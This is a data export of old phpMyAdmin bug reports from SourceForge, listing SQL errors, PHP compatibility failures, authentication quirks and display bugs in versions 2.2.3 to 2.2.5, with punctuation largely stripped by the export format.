5D 3B 0D 0A 09BORDER BOTTOM 3A 24tempvars 5Binputborder 5D solid 24tempvars 5Binputbordersize 5D 3B 0D 0A 09COLOR 3A 24tempvars 5Binputtextcolor 5D 3B 0D 0A 09FONT FAMILY 3A 24tempvars 5Bfontface 5D 3B 0D 0A 09FONT SIZE 3A 24tempvars 5Binputtextsize 5D 3B 0D 0A 7D 0D 0A 3C 2Fstyle 3E 0D 0A 3C 2Fhead 3E 0D 0A 3Cbody bgcolor 3D 22 24tempvars 5Bbackground 5D 22 text 3D 22 23000000 22 link 3D 22 23000000 22 vlink 3D 22 23000000 22 alink 3D 22 23000000 22 3E 0D 0A 24navigation 0D 0A 3Ctable width 3D 22100 25 22 border 3D 220 22 cellspacing 3D 220 22 cellpadding 3D 220 22 bgcolor 3D 22 23000000 22 align 3D 22center 22 3E 0D 0A 3Ctr 3E 0D 0A 3Ctd bgcolor 3D 22 23FFFFFF 22 3E 0D 0A 3Cbr 3E 3Cdiv align 3D 22center 22 3E 24include 3C 2Fdiv 3E 3Cbr 3E 0D 0A 3C 2Ftd 3E 0D 0A 3C 2Ftr 3E 0D 0A 3C 2Ftable 3E 0D 0A 3Cbr 3E 0D 0A 3C 21 Do Not Remove This Copyright 3E 0D 0A 3Cdiv align 3D 22center 22 3E 3Cfont face 3D 22 24tempvars 5Bfontface 5D 22 size 3D 221 22 color 3D 22 23FFFFFF 22 3E 0D 0AOpen Bulletin Board 1.0.0 Release Canidate 2 3Cbr 3E 0D 0A 26copy 3B 2001 3Ca href 3D 22http 3A 2F 2Fwww.iansoft.net 22 3EIansoft Enterprises 3C 2Fa 3E 3C 2Fdiv 3E 3C 2Ffont 3E 0D 0A 3C 21 Do Not Remove This Copyright 3E 0D 0A 3C 2Fbody 3E 0D 0A 3C 2Fhtml 3E 27 AND groupid 3D 270 27 amp;amp;sql query=SELECT 2A FROM templates amp;amp;goto=sql.php Error SQL query SELECT FROM templates WHERE id = 0 AND template = amp;lt;!DOCTYPE HTML PUBLIC amp;quot; W3C DTD HTML 4.0 Transitional EN amp;quot; amp;gt; amp;lt;html amp;gt; amp;lt;head amp;gt; amp;lt;title amp;gt; boardname amp;lt; title amp;gt; amp;lt;meta name= amp;quot;keywords amp;quot; content= amp;quot;bbs, openbb, forum, board, blazeboard, discussion, bb2 amp;quot; amp;gt; amp;lt;meta name= amp;quot;description amp;quot; content= amp;quot;is a discussion forum powered by OpenBB amp;quot; amp;gt; amp;lt;meta http equiv= amp;quot;Content Type amp;quot; content= amp;quot;text html; charset=iso 8859 1 amp;quot; amp;gt; amp;lt;meta http equiv= amp;quot;expires amp;quot; content= amp;quot; 1 amp;quot; amp;gt; amp;lt;meta http equiv= amp;quot;Pragma amp;quot; content= amp;quot;no cache amp;quot; amp;gt; amp;lt;meta http equiv= amp;quot;Cache Control amp;quot; content= amp;quot;no cache amp;quot; amp;gt; amp;lt;meta http equiv= amp;quot;MSThemeCompatible amp;quot; content= amp;quot;Yes amp;quot; amp;gt; amp;lt;style type= amp;quot;text css amp;quot; amp;gt; INPUT, SELECT, TEXTAREA \{ BACKGROUND COLOR tempvars[inputbg]; BORDER LEFT tempvars[inputborder] solid tempvars[inputbordersize]; BORDER RIGHT tempvars[inputborder] solid tempvars[inputbordersize]; BORDER TOP tempvars[inputborder] solid tempvars[inputbordersize]; BORDER BOTTOM tempvars[inputborder] solid tempvars[inputbordersize]; COLOR tempvars[inputtextcolor]; FONT FAMILY tempvars[fontface]; FONT SIZE tempvars[inputtextsize]; \} amp;lt; style amp;gt; amp;lt; head amp;gt; amp;lt;body bgcolor= amp;quot; tempvars[background] amp;quot; text= amp;quot; 000000 amp;quot; link= amp;quot; 000000 amp;quot; vlink= amp;quot; 000000 amp;quot; alink= amp;quot; 000000 amp;quot; amp;gt; navigation amp;lt;table width= amp;quot;100 amp;quot; border= amp;quot;0 amp;quot; cellspacing= amp;quot;0 amp;quot; cellpadding= amp;quot;0 amp;quot; bgcolor= amp;quot; 000000 amp;quot; align= amp;quot;center amp;quot; amp;gt; amp;lt;tr amp;gt; amp;lt;td bgcolor= amp;quot; MySQL said You have an error in your SQL syntax near amp;lt;!DOCTYPE HTML PUBLIC amp;quot; W3C DTD HTML 4.0 Transitional EN amp;quot; amp;gt; amp;lt;html amp;gt; amp;lt;head amp;gt; at line 1 Solution Don t use amp;quot;AND template= amp;quot; as id is primary and no more fields is needed to describe which field is to be edited.
Original URL https sourceforge.net p phpmyadmin bugs 313 https sourceforge.net p phpmyadmin bugs 313 Original author anonymous Found in version 2.2.3","bug"
"24444","6684","2.2.3) Missing Comma in Revoke User Permissions.
When examining the user permissions for a specific database, a list of users and their permissions is presented.
Clicking on the amp;quot;Revoke amp;quot; link on this page generates an error, becuase of a missing comma in the list of permissions being revoked.
Here is the URL referenced by the amp;quot;Revoke amp;quot; link http localhost phpMyAdmin sql.php?lang=en amp;amp; server=1 amp;amp;db=mysql amp;amp;table=user amp;amp;sql query= REVOKE SELECT 2C INSERT 2C UPDATE 2C DELETE 2C CREATE 2C DROP 2C PROCESS 2C FILE 2C REFERENCES INDEX 2C ALTER ON 2A.
2A FROM 27cyface 27 40 27 25 27 amp;amp;zero rows= You have revoked the privileges for 3Cspan style 3D 22color 3A 23002E80 22 3Ecyface 40 25 3C 2Fspa n 3E 3Cbr 2F 3ERemember reload the server.
amp;amp;goto=user details.php Here is the Error Page Database mysql table user running on localhost Error SQL query REVOKE SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, PROCESS, FILE, REFERENCES INDEX, ALTER ON .
FROM cyface MySQL said You have an error in your SQL syntax near INDEX, ALTER ON .
FROM cyface at line 1 There should be a comma between amp;quot;REFERENCES amp;quot; and amp;quot;INDEX amp;quot;.
Thanks!
Back Original URL https sourceforge.net p phpmyadmin bugs 315 https sourceforge.net p phpmyadmin bugs 315 Original author cyface Found in version 2.2.3","bug"
"24444","6685","2.2.3) No Login required after logout.
I am running phpmyadmin 2.2.3 on mysql 3.23.36.
Here is the problem I log into the database with a valid username and password.
I go about my business, and when I am done, I return to amp;quot;Home amp;quot; and logout.
I then hit cancel when asked for a new username and password.
I then get the page that states amp;quot;Wrong username password.
Access denied.
amp;quot; Now here is the scary thing.
If I hit the amp;quot;back amp;quot; button in my browser MSIE 5.01) I am returned to the amp;quot;Welcome to phpMyAdmin screen I was at after logging in previously.
I can then go about editing the database at will, having never re entered a username and password using the username password I had thought I had logged out from).
Original URL https sourceforge.net p phpmyadmin bugs 316 https sourceforge.net p phpmyadmin bugs 316 Original author neurodoc","bug"
"24444","6686","problem with htacess.
problem with htacess and errorhandler when i del becam i a error redirect Original URL https sourceforge.net p phpmyadmin bugs 317 https sourceforge.net p phpmyadmin bugs 317 Original author anonymous Found in version 2.2.3","bug"
"24444","6687","2.2.4) case sensitivity in unix.
With any flavor of Unix or Linux or any of their counterparts), most things are case sensitive.
The same holds true for MySQL queries.
In the user details.php, there were several instances where [ User ] was being called when it should have been [ user ], due to the way the default MySQL tables are set up for the users.
It is all lowercase mysql.users, mysql.blah).
I had to dive into user details.php and change the lines necessary.
I was debating creating a .patch and uploading it to sf.net for this bug error , but have hesistated to do so, on the offchance that you have already fixed this bug in the current CVS.
Jason M. Hecker Jason Hecker hotmail.com Original URL https sourceforge.net p phpmyadmin bugs 318 https sourceforge.net p phpmyadmin bugs 318 Original author anonymous","bug"
"24444","6688","2.2.3) tbl printview misc errors.
1) The tbl printview.php file is missing the urldecode ) calls for table names.
Solution simply add table = urldecode table) after while ... each the tables) patched version attached.
2) Layout if more then one table is shown there should be a amp;lt;hr amp;gt; after the listing of following tables if only one table is shown its name should never the less be presented.
Original URL https sourceforge.net p phpmyadmin bugs 319 https sourceforge.net p phpmyadmin bugs 319 Original author helly","bug"
"24444","6689","HTTP USER AGENT in php 4.1 .
Not all user agents use the corresponding http header.
Therefore the HTTP USER AGENT or the SERVER [ HTTP USER AGENT ] variable is not allways present.
Solution simply define it when necessary as an empty string, see attached file.
Original URL https sourceforge.net p phpmyadmin bugs 320 https sourceforge.net p phpmyadmin bugs 320 Original author helly","bug"
"24444","6690","HTML Encoding.
Neither the language files nor information read dynamically uses html character encodings.
When doing this you must have an encoding header in your http response and you should have one in your http body generated answer).
The first is set dynamically but the second not.
But the more useful method is to use ASCII encoding together with html character entities.
Original URL https sourceforge.net p phpmyadmin bugs 321 https sourceforge.net p phpmyadmin bugs 321 Original author helly Found in version 2.2.3","bug"
"24444","6691","2.2.4) records get inserted twice.
With 2.2.4 rc1 when inserting records a record gets inserted twice whith the following procedures I select a table and select insert, I enter the first row and check the button amp;quot;Insert another new row amp;quot;, then I insert the second row and also choose the amp;quot;Insert another new row amp;quot; option, then I insert the third row and leave the amp;quot;Go back to previous page amp;quot; option checked.
Now it goes to the amp;quot;previous page amp;quot; ok BUT it also inserts the first row for an another time.
So the second last row gets always inserted twice.
Original URL https sourceforge.net p phpmyadmin bugs 322 https sourceforge.net p phpmyadmin bugs 322 Original author sikapossu","bug"
"24444","6692","2.2.4) mysql safe show database=on support.
When using http or cookie auth with the mysql server configured with safe show database = on, not all accessible databases are shown for users that do not have their own access to the `mysql` database.
I use safe show database on my mysql installation because it is more secure in that users are not able to see all the databases on the mysql server when using the statement amp;quot;SHOW DATABASES amp;quot;.
Only the databases they have access to are shown.
This causes a problem for php when it tries to build the accessible databases list for users.
On line 581 in libraries common.lib.php, amp;quot; uva alldbs = mysql list dbs dbh); amp;quot; is called.
Since it is using the dbh database handle the one used by stduser) only the tables accessible by the stduser are returned.
Most likely only `mysql` and `test`.
So a few lines lower on 589 when this list is compared against what the mysql.db database returns, databases that the user has legitimate access to are ignored because the stduser doesn t have access to them.
If you change 581 to use the userlink database handle this is fixed, because the mysql list dbs call will return all only the databases that the user has access to precisely.
I will attach a patch to fix this problem.
Original URL https sourceforge.net p phpmyadmin bugs 323 https sourceforge.net p phpmyadmin bugs 323 Original author pbaker Found in version 2.2.4","bug"
"24444","6693","2.2.4) Undefined index Rows.
Warning Undefined index Rows in phpMyAdmin db details.php on line 191 Original URL https sourceforge.net p phpmyadmin bugs 324 https sourceforge.net p phpmyadmin bugs 324 Original author spinaker Found in version 2.2.4","bug"
"24444","6694","2.2.4) Problem selecting Databases with blanks.
Hi, creating a database with blanks in its name works fine with phpMyAdmin, for example amp;quot;my db amp;quot;, selecting it on the left menu doesn t work though, the menubar just hops back to amp;quot;Please select a database amp;quot;.
Greetz Simon Original URL https sourceforge.net p phpmyadmin bugs 325 https sourceforge.net p phpmyadmin bugs 325 Original author anonymous Found in version 2.2.4","bug"
"24444","6695","2.2.4) display tbl.lib.php3 Parse error.
Parse error parse error in .
libraries display tbl.lib.php3 on line 665 PHP Version 3.0.18 Original URL https sourceforge.net p phpmyadmin bugs 326 https sourceforge.net p phpmyadmin bugs 326 Original author anonymous Found in version 2.2.4","bug"
"24444","6696","2.2.4) read dump.php3 amp;gt; parse error.
Parse error parse error in read dump.php3 on line 249 when submitting a query.
running PHP 3.0.14 on IRIX64 IRIS 6.5 I guess On the specific line || and === get used... and these operators are only available to php4.
Original URL https sourceforge.net p phpmyadmin bugs 327 https sourceforge.net p phpmyadmin bugs 327 Original author anonymous Found in version 2.2.4","bug"
"24444","6697","2.2.5 dev.
In this version i see again one mistake !
look self on your example at http phpmyadmin.sourceforge.net phpMyAdmin if you make a table with a point, he make mistakes !
Greets Michaelius Original URL https sourceforge.net p phpmyadmin bugs 328 https sourceforge.net p phpmyadmin bugs 328 Original author michaelius","bug"
"24444","6698","phpmyAdmin gt; Apache memory growing.
Hello, i use phpmyAdmin 2.24 with MySQL 3.23.44 and Apache 1.3.19 .
If i work with phpmyAdmin the httpd used more and more memory.
The only way to free it, is to restart the apache.
i look in config.inc.php, but cfgPersistentConnections = FALSE; So where is the error?
BY Joerg jp anygate.de Original URL https sourceforge.net p phpmyadmin bugs 329 https sourceforge.net p phpmyadmin bugs 329 Original author anonymous","bug"
"24444","6699","2.2.4) float 4,2) and field length.
We should be able to enter a large value in this kind of field 4 is the number of bytes for internal storage, not the number of significant digits).
Same thing for REAL and DOUBLE.
Original URL https sourceforge.net p phpmyadmin bugs 330 https sourceforge.net p phpmyadmin bugs 330 Original author lem9","bug"
"24444","6700","2.2.4) Check for LIMIT clause.
When you enter a query with a LIMIT clause in the Run SQL query queries on database... textarea box, the query fails because phpMyAdmin automatically adds its own LIMIT clause.
It d be nice if it checked for a LIMIT clause before appending.
Original URL https sourceforge.net p phpmyadmin bugs 331 https sourceforge.net p phpmyadmin bugs 331 Original author catlingm Found in version 2.2.4","bug"
"24444","6701","2.2.4) set field doesn t show right in edit.
When editing a record, any enum fields do not reflect the current record content in the database.
For example, If I have an enum field with the possible choices of bubblegum,spearmint,peppermint,cinnamin and I have selected spearmint,cinnamin in the record, it shows correctly in the browse screen, but the edit screen defaults to bubblegum.
If I submit the record, it submits bubblegum to the database, changing the record without me changing it.
Running Win98se, MySQL 3.23.42 win, php 4.06, phpMyAdmin 2.2.4.
This error also occurred in 2.2.3 rc1, but not the version I had before that.
I don t recall the version number before that.)
I don t have a SourceForge login, but am willing to try to find a fix for this if you d like.
Original URL https sourceforge.net p phpmyadmin bugs 332 https sourceforge.net p phpmyadmin bugs 332 Original author anonymous Found in version 2.2.4","bug"
"24444","6702","2.2.4) Undefined variable in tbl create.php.
This error occurs only if you have set error reporting = E ALL in your php.ini.
Way to reproduce it create new table name doesn t matter) with 1 or more fields, name the fields, leave the Primary , Index , Unique Buttons unchecked and press save .
The following error message appears Warning Undefined variable field key 0 in d \htdocs\phpmyadmin224\tbl create.php on line 40 Warning Undefined variable field key 0 in d \htdocs\phpmyadmin224\tbl create.php on line 43 Warning Undefined variable field key 0 in d \htdocs\phpmyadmin224\tbl create.php on line 46 ... System Win2k SP2, Apache 1.3.23, PHP 4.1.1, MySQL 3.23.45 Thanks in Advice Dark Shadow Original URL https sourceforge.net p phpmyadmin bugs 333 https sourceforge.net p phpmyadmin bugs 333 Original author dark shadow Found in version 2.2.4","bug"
"24444","6703","Incorrect table info for MySQL 3.23.2 a.
The table listing db details.php) was incorrect when I upgraded it was showing only the first letter of each table and under amp;quot;type amp;quot; was showing the same letter the first letter of the table).
Somewhere in MySQL Version 3.23.x the SHOW TABLE STATUS was changed to return this information, but it wasn t before 3.23.2 alpha.
I changed the the following line in db details.php else if PMA MYSQL INT VERSION amp;gt;= 32300) \{ TO else if PMA MYSQL INT VERSION amp;gt;= 32303) \{ and it worked fine my version is 32302, of course) I m not sure what the correct version should be for the cutoff...
Thanks, Brad Original URL https sourceforge.net p phpmyadmin bugs 334 https sourceforge.net p phpmyadmin bugs 334 Original author anonymous","bug"
"24444","6704","2.2.4) Using SSL amp;gt; cookies are unsecure.
From an anonymous user inside the amp;quot;help amp;quot; forum Hello, I seem to be having trouble running MyPhpAdmin using HTTPS.
When I try to do this out of the box by specifying a URL like https myhost) phpMyAdmin I get a warning in my browser that the page contains both secure and unsecure items.
When I look at the traffic with a sniffer, I see that all of the traffic is sent via HTTPS, but the cookies are being sent as regular HTTP, hence the error.
I am not sure how to fix this.
I am using IE as the browser and Apache as the server.
I have tried the suggestion in the phpMyAdmin documentation that suggests adding SetEnvIf User Agent amp;quot;.
MSIE.
amp;quot; nokeepalive ssl unclean shutdown to the httpd.conf file, but this has no effect.
Thanks!
Bob Original URL https sourceforge.net p phpmyadmin bugs 335 https sourceforge.net p phpmyadmin bugs 335 Original author loic1 Found in version 2.2.4","bug"
"24444","6705","default values sometimes take no effect.
The default values set in MySQL under some circumstances take no effect if inserting new entries.
By inserting new entries through MySQL s client, they take effect.
phpMyAdmin 2.2.3 MySQL 3.23.43 PHP 4.1.1 Yours, Daniel Original URL https sourceforge.net p phpmyadmin bugs 336 https sourceforge.net p phpmyadmin bugs 336 Original author anonymous Found in version 2.2.3","bug"
"24444","6706","2.2.4) error with php3 compatibility.
the ini get and ini set functions are both php4 only and you seem to be using ini get to determin if uploads are enabled you need to fix this or say it is not campatible with php3 for file uploading ini get PHP 4 amp;gt;= 4.0.0) ini get Gets the value of a configuration option Original URL https sourceforge.net p phpmyadmin bugs 337 https sourceforge.net p phpmyadmin bugs 337 Original author digitalxero Found in version 2.2.4","bug"
"24444","6707","2.2.4) Parse Error in tbl printview.php on line.
Parse error parse error, expecting ` ) in data www dregis docs sh b phpMyAdmin tbl printview.
php on line 328 I have tried to find the missing ).
but not able to.
Original URL https sourceforge.net p phpmyadmin bugs 339 https sourceforge.net p phpmyadmin bugs 339 Original author silverday Found in version 2.2.4","bug"
"24444","6708","Renaming column automatically.
When selecting two tables with one same called column, phpMyAdmin renames the first one as same as the second one.
Original URL https sourceforge.net p phpmyadmin bugs 338 https sourceforge.net p phpmyadmin bugs 338 Original author anonymous Found in version 2.2.4","bug"
"24444","6709","2.2.4) auth type cookie, http.
I am accessing phpMyAdmin using IE 5.1.3 on Mac OS 10.1.3.
When i try to use cookies as the auth type, I put my username and password in and hit submit, it then takes me into the two frames and both of them load the username amp;amp; password screen.
When I do http authentication, I get an internal server error.. that might be a host problem though.. im not sure on that one.
Rick Original URL https sourceforge.net p phpmyadmin bugs 340 https sourceforge.net p phpmyadmin bugs 340 Original author anonymous Found in version 2.2.4","bug"
"24444","6710","bugs from 2.2.2 to 2.2.4.
These are some bugs I found in phpmyadmin versions from 2.2.2 to 2.2.4.
All tests are made with the same config file with multiple servers and multiple databases.
Server Apache 1.3.12 Unix) PHP 3.0.14 mod perl 1.21 01 ApacheJServ 1.1 mod ssl 2.6.2 OpenSSL 0.9.4 Apache Release 10312100 Apache API Version 19990320 MySQL 3.22.26a PHP Version 3.0.14 Client PPC G3 Mac OS 9.2 Internet Explorer 5.1 Mozilla 4.0 compatible; MSIE 5.13; Mac PowerPC) I found problems in Displaying mysql info amp;amp; vars in the first page blank page as result) Displaying the input filepath browse) for external text file containing sql queries.
Execution of sql queries in the text area blank page as result).
The bugs table version is Version | Mysql info amp;amp; vars | browse button | Execute query 2.2.0 | yes | yes | yes 2.2.1 | yes | yes | yes 2.2.2 | no | yes | no 2.2.3 | no | yes | yes 2.2.4 | no | no | no Please, tell me something about these things Thankyou amp;amp; best regards Original URL https sourceforge.net p phpmyadmin bugs 341 https sourceforge.net p phpmyadmin bugs 341 Original author anonymous","bug"
"24444","6711","2.2.4) Left frame not working in Opera 6.01.
It seems that the left frame does not work properly in Opera 6.01.
I have tried the posibility to identify Opera as IE, Netscape, Mozilla, etc.
Either the plus sign does not work for watching all the tables or the database list with tables gets a mile long Original URL https sourceforge.net p phpmyadmin bugs 342 https sourceforge.net p phpmyadmin bugs 342 Original author anonymous Found in version 2.2.4","bug"
"24444","6712","\r\n insterted in blobs.
When I open a blob all amp;quot;returns amp;quot; line feed) are displayed as amp;quot;\r\n amp;quot;.
When I save the same blob without editing and getting the date with a php script, it will show as amp;quot;\r\n amp;quot; in the browser, not as a line feed.
So when I have to edit text in blobs i have to 1) copy it in to notepad 2) replace all \r\n manual with a amp;quot;return amp;quot;, since notepad can not insert the control charakter for return 3) edit the text 4) put it back in to the blob and save thats VERY sad!
Original URL https sourceforge.net p phpmyadmin bugs 343 https sourceforge.net p phpmyadmin bugs 343 Original author anonymous Found in version 2.2.4","bug"
"24444","6713","2.2.5 rc1) Something will be send before header.
Just 11 3 2002 15 00) downloaded 2.2.5 from CVS index.php3 tries to start, but somwhere there will be send something before the header, seems to be the greetingstring welcome to .... Greetings, Oliver Original URL https sourceforge.net p phpmyadmin bugs 344 https sourceforge.net p phpmyadmin bugs 344 Original author anonymous Found in version 2.2.5 rc1","bug"
"24444","6714","2.2.5 rc1) safe show database MySQL version.
There is a bug with older mySQL versions I found it on mysql 3.22.24) that doesn t know safe show database.
The error is in common.lib.php on line 544.
Greets, Oliver.
Original URL https sourceforge.net p phpmyadmin bugs 345 https sourceforge.net p phpmyadmin bugs 345 Original author anonymous Found in version 2.2.5 rc1","bug"
"24444","6715","Displaying wrong column information.
First of all thanks for a great product.
The problem is displayed when using the free form SQL input field and displaying data from two tables both of which have a field with the same name.
Data from the first column is displayed in the second column instead of the second column s data.
ie.
The output parser is not recognising that the two column names although the same) are from different tables and should have different data.
Maybe a suggestion would be to display the column name in table.field format when selecting from multiple tables.
Original URL https sourceforge.net p phpmyadmin bugs 346 https sourceforge.net p phpmyadmin bugs 346 Original author andrewherbert Found in version 2.2.4","bug"
"24444","6716","2.2.3) header.
Hello, phpMyAdmin 2.2.3 I got no charset coding or wrong one) on index page, despite I got good charset value in my polish lang file waiting for reply Original URL https sourceforge.net p phpmyadmin bugs 347 https sourceforge.net p phpmyadmin bugs 347 Original author kubaf Found in version 2.2.3","bug"
"24444","6717","2.2.3) LOAD INFILE when LOCAL disabled.
Hello I m using Mysql 3.23.49 in that version LOCAL keyword in command LOAD DATA INFILE file.txt is not allowed, so it s time to fix it i.e.
copy file from client mashine to server and then run LOAD... command but without LOCAL keyword waiting for reply JF kuba 3net.pl Original URL https sourceforge.net p phpmyadmin bugs 348 https sourceforge.net p phpmyadmin bugs 348 Original author kubaf Found in version 2.2.3","bug"
"24444","6718","2.2.5 rc1) Undefined index when changing password.
When I change my password I get a php warning after submitting the form Warning Undefined index db in [phpmyadmin path]\libraries\common.lib.php on line 922.
Original URL https sourceforge.net p phpmyadmin bugs 349 https sourceforge.net p phpmyadmin bugs 349 Original author rabus Found in version 2.2.5 rc1","bug"
"24444","6719","optimize delete print select in DB View.
is what the way it should work!?
under Ie6.0 Win2k in db details.php i wanted to optimize all tables and the operation starts immediately after i selected amp;quot;optimize amp;quot; from the pulldown menu shouldnt it wait til i click amp;quot;OK amp;quot; and not amp;quot;onchange= amp;quot;this.form.submit ) amp;quot; coz it behaves differentthan, because it only does that the first time you change the pulldown value but you have to click amp;quot;OK amp;quot; if you want some other tables to be optimized!?)
Someone might be going panic if one wants to delete some tables ... LOL But i dont think i really need the question on the next page asking me if i want to run the query amp;quot;OPTIMIZE TABLE `statistik` amp;quot; but might be ok for delete ; )) Think thats just coz someone has been amp;quot;lazy amp;quot; and just reusing normal run query function s Original URL https sourceforge.net p phpmyadmin bugs 350 https sourceforge.net p phpmyadmin bugs 350 Original author thebelgarion Found in version 2.2.5 rc1","bug"
"24444","6720","Join table bug.
When I tried to run an SQL query via PhpMyAdmin like this one SELECT t1.id,t1.name,t2.name FROM table1 AS t1, table2 AS t2 WHERE t1.group=t2.id PhpMyAdmin doesn t show the t1.name column in the result, instead it shows the t2.name column twice.
So I tested this query in MySQL itself and it does work like expected there.
I m not sure if this bug is already fixed in 2.2.5 but I believe not.
PhpMyAdmin Version 2.2.4 PHP Version 4.1.2 MySQL Version 3.23.42 Apache Version 1.3.23 Linux 2.4.18 Original URL https sourceforge.net p phpmyadmin bugs 351 https sourceforge.net p phpmyadmin bugs 351 Original author anonymous Found in version 2.2.4","bug"
"24444","6721","2.2.5) Superusers can t change password.
Hi, For superusers, main.php displays the amp;quot;Change password amp;quot; link even when cfgShowChgPassword is set to FALSE in config.inc.php which, I think, is intended behaviour).
But when you click the link, user password.php reports that amp;quot;You don t have enough rights to be here right now!
amp;quot; which seems odd for superusers.
To fix the problem, I added the following before line 16 of user password.php to determine if the current user superuser status is superuser = mysql query USE mysql , userlink); Then I changed line 16 which is now line 17) so that it checks is superuser in addition to checking cfgShowChgPassword if cfgServer[ auth type ] == config ) || !
cfgShowChgPassword || is superuser)) \{ This fix works fine for me though I m not 100 sure that my changes do not unintentionally break some other functionality.
Sam Original URL https sourceforge.net p phpmyadmin bugs 352 https sourceforge.net p phpmyadmin bugs 352 Original author mfichtner Found in version 2.2.5","bug"
"24444","6722","2.2.5) Can t change user hosts.
When I try to change the host of a User I get a mysql error.
It s in user details.php3 somewhere around line 1219 because in line 1216 local query is empty.
The query is then UPDATE user SET WHERE Host= AND User= username When I change local query to sql query cpy in line 1219 it works without problems.
It s in the latest cvs version but I think also in 2.2.5 because the file hasn t changed since then.
Original URL https sourceforge.net p phpmyadmin bugs 353 https sourceforge.net p phpmyadmin bugs 353 Original author pcgod Found in version 2.2.5","bug"
"24444","6723","2.2.5) special user can t see the db s list.
if I create a user with no privileges at all then I set the permission to use the mysql db to that user GRANT USAGE ON `mysql`.
TO user localhost ) then I insert a row for that user into db table, with a in the db field, and Y for the permission that I want for that user, that permission are for ALL the databases but mysql after that, when I login using that user to the mysql server using the console command, i can see all the db show databases;) but mysql.
if I do the same thing through phpMyAdmin, I can t see the databases but I can work with them, so i have the right permissions why i can t see the databases from phpMyAdmin?
i use phpMyAdmin 2.2.5, mysql 3.23.36, php 4.0.6 Original URL https sourceforge.net p phpmyadmin bugs 354 https sourceforge.net p phpmyadmin bugs 354 Original author anonymous Found in version 2.2.5","bug"
"24444","6724","2.2.5) Using bookmarks with diff.
MySQL servers.
I have more than one server configured and set cfgServerDefault = 0.
When i logging to another server not 0) and run any successful query i do bookmark this query.
But my bookmarked query saving to bookmarkDB located on server 0, instead of that, what be saved on which they were executed.
Accordingly i don t have bookmarks to servers another that 0, though boomark database created on all servers.
Original URL https sourceforge.net p phpmyadmin bugs 355 https sourceforge.net p phpmyadmin bugs 355 Original author anonymous","bug"
"24444","6725","2.2.5) JS Error in tbl change.php3.
when you have blob field which can be NULL) and you want to edit data and set data to NULL you have JS Error elements[...] is null or not an object.
and also value is NOT after submit NULL.
shorter there is no posibility to reset blob data to NULL.
version 2.2.6 dev JS file tbl change.js line 35) PHP file tbl change.phpX ============= Igor Original URL https sourceforge.net p phpmyadmin bugs 356 https sourceforge.net p phpmyadmin bugs 356 Original author mligor Found in version 2.2.5","bug"
"24444","6726","2.2.5) MSIE not connected through cookies.
MSIE 5.5) cant read cookies cookie.auth.lib.php s 374) time ) 60 60 24 30) I delete function time ), all working.
Original URL https sourceforge.net p phpmyadmin bugs 357 https sourceforge.net p phpmyadmin bugs 357 Original author javalup Found in version 2.2.5","bug"
"24444","6727","2.2.5) DOCTYPE line contains line feed.
I got a blank html page, it was impossible to run phpMyAdmin.
I removed the \n in the first html line ni index.php and now that s ok. amp;lt;!DOCTYPE html PUBLIC amp;quot; W3C DTD XHTML 1.0 Frameset EN amp;quot; amp;quot;http www.w3.org TR xhtml1 DTD xhtml1 frameset.dtd amp;quot; amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 358 https sourceforge.net p phpmyadmin bugs 358 Original author anonymous Found in version 2.2.5","bug"
"24444","6728","2.2.5) NS 4.79) javascript textarea selection buggy.
The SQL textarear javascript textarea selection is incredibly annoying.
It makes it next to impossible to actually edit the query.
Using Netscape 4.79 Original URL https sourceforge.net p phpmyadmin bugs 359 https sourceforge.net p phpmyadmin bugs 359 Original author anonymous Found in version 2.2.5","bug"
"24444","6729","2.2.5) undefined variables.
When I try to insert a row that is not being accepted by MySQL e.g.
because of a dublicate entry for a key), phpMyAdmin displays a page Error SQL query something MySQL said something else When I click the amp;quot;back amp;quot; link at the bottom of that page I get the following php errors Warning Undefined variable db in [phpMyAdmin directory]\tbl properties.php3 on line 37 Warning Undefined variable db in [phpMyAdmin directory]\tbl properties.php3 on line 45 Warning Undefined variable table in [phpMyAdmin directory]\tbl properties.php3 on line 47 Warning Cannot add header information headers already sent by output started at [phpMyAdmin directory]\tbl properties.php3 37) in [phpMyAdmin directory]\phpmyadmin\tbl properties.php3 on line 73 I m running the latest CVS version of phpMyAdmin.
MySQL 4.0.1 alpha php 4.1.2 Apache 1.3.23 Windows NT 5.1 I also tried out phpMyAdmin 2.2.5 final again as I discovered this bug.
Same procedure, other errors Warning Undefined variable db in [phpMyAdmin directory]\db details.php on line 21 Warning Cannot add header information headers already sent by output started at [phpMyAdmin directory]\db details.php 21) in [phpMyAdmin directory]\db details.php on line 34 Happy fixing ) Rabus Original URL https sourceforge.net p phpmyadmin bugs 360 https sourceforge.net p phpmyadmin bugs 360 Original author rabus Found in version 2.2.5","bug"
"24444","6730","2.2.5) Unable to click quot;Edit quot; link.
I guess this is an IE 6 limitation or something like that... moreover, this may have already been discussed... but who knows you may be able to fix that problem.
I noticed a strange problem when you use the SELECT option on a table having many fields and then enter a value for a field... then you cannot click on the Edit.
In fact you can click... but whatever strong you push on the left mouse button it won t do a sh t. If ever you right click and select amp;quot;Open in new window amp;quot; then it will work.
Now... if you do some modification on the record and hit the Go button in order to save the alteration, it will save it but won t be able to display the request again but will rather display an error message SQL query SELECT `ID`,`NOM DIRECTION`,`CODE SIEGE`,`CODE DIRECTION`,`COD E SUCC`,`NOM SIEGE`,`CODE BDF`,`CLOS`,`ADRESSE POSTE 1` ,`ADRESSE POSTE 2`,`ADRESSE POSTE 3`,`ADRESSE POSTE 4`, `ADRESSE CADASTRE 1`,`ADRESSE CADASTRE 2`,`ADRESSE CADA STRE 3`,`CODEPOSTAL`,`TEL PUBLIC 1`,`TEL PUBLIC 2`,`TEL PUBLIC 3`,`TEL PUBLIC 4`,`TEL BNP`,`FAX`,`SWIFT`,`CODE DIV`,`CODE DG`,`CARTES VALID`,`CARTES IMPRIMEURS`,`MOB ILES VALID`,`MOBILES GEST`,`CMD MySQL said Unknown column ID in field list As you can see the request is not complete ;) The funny trick is that it looks like the modification was recorded successfully.... You may be able to find a way to fix this issue...
I hope so heh Well Im Using IE 6.0.2600.0000IC English) phpMyAdmin 2.2.5 Server Apache 1.3.23 Leblanc Original URL https sourceforge.net p phpmyadmin bugs 361 https sourceforge.net p phpmyadmin bugs 361 Original author anonymous Found in version 2.2.5","bug"
"24444","6731","2.2.5) Comments and MySQL 3.22.32.
From the forum I always have this warning when displaying table s properties.
What can I do ?
Warning Undefined index Comment in var www myadmin tbl indexes.php on line 95 I have phpMyAdmin 2.2.4 and MySQL 3.22.32 Original URL https sourceforge.net p phpmyadmin bugs 362 https sourceforge.net p phpmyadmin bugs 362 Original author lem9","bug"
